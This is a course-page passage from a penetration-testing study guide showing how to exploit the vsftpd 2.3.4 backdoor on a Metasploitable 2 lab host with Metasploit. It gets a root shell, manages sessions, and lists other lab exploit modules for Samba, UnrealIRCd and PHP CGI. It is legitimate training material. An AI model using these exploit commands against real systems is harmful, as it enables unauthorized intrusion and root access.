Ravindra BagaleCourses & study guides

23. Exploitation with Metasploit

23.4 Running an Exploit and Getting a Session

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.20
msf6 exploit(...) > exploit
[*] 192.168.56.20:21 - Banner: 220 (vsFTPd 2.3.4)
[+] 192.168.56.20:21 - Backdoor service has been spawned...
[*] Command shell session 1 opened

You now have a shell session. Basic session handling:

id                          # run a command in the session (you are usually root here)
^Z                          # background the session (or 'background')
msf6 > sessions             # list active sessions
msf6 > sessions -i 1        # interact with session 1 again
msf6 > sessions -K          # kill all sessions when done

Other classic Metasploitable 2 practice modules (all lab only): exploit/multi/samba/usermap_script (Samba), exploit/unix/irc/unreal_ircd_3281_backdoor (UnrealIRCd), exploit/multi/http/php_cgi_arg_injection.

Snapshot first, restore after

Exploits can leave a service broken. This is exactly why you took a clean snapshot – restore it after practice so the lab stays in a known state.

Ravindra Bagale's Tip

Session milala ki students lagech sagli kade phirtat. Aadhi id aani hostname chalava – kuthe aahot, kon aahot he confirm kara. Ani kaam zalyavar sessions -K ne band kara; ughde sessions visarne ही chuk aahe.

Lab

Exploit the vsftpd backdoor on Metasploitable 2, run id and hostname in the shell to confirm you are root, background the session, list it with sessions, then kill it with sessions -K. Restore your snapshot afterwards.